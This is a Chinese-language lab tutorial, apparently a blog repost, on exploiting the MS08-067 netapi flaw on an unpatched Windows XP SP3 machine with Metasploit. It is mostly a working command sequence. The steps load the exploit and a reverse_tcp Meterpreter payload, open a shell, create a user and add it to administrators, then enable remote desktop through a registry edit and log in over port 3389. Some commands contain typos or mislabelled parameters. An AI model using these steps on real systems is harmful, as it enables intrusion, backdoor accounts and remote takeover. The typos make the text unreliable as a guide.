WIN xp sp3 系统上Ms08_067_netapi漏洞利用

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;

1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.csdn.net/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 :
msfconsole
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第1张图片
打开metasploit之前需要连接上postgresql:
service postgresql statr
3:寻找和加载 Ms08_067模块
(1):使用搜索命令搜索此模块:
search ms08_067_netapi
(2):应用搜索到的模块地址:
use exploit/windows/smb/ms08_067_netapi
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第2张图片
4: 我们来加载一枚payload:
set payload windows/meterpreter/reverse_tcp

此时加载完毕可以查看需要设置的参数:
show options

然后如下图所示:
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第3张图片
5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip:
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:
exploit


WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第4张图片
6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:

(1):建立用户:
user net 用户名 密码 /add

(2):提权:
net localgroup administrators wmc /add


WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第5张图片

WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第6张图片
7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开:
netstat -na

WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第7张图片

(2):显然并没有,那么我们就给它打开: 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第8张图片
可以看到,3389端口已经打开。

8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第9张图片
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第10张图片
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:

WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第11张图片
(3):就成功进入了:

WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第12张图片
此时完成所有操作。
总结:
WIN xp sp3 系统上Ms08_067_netapi漏洞利用_第13张图片
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。


你可能感兴趣的:(WIN xp sp3 系统上Ms08_067_netapi漏洞利用)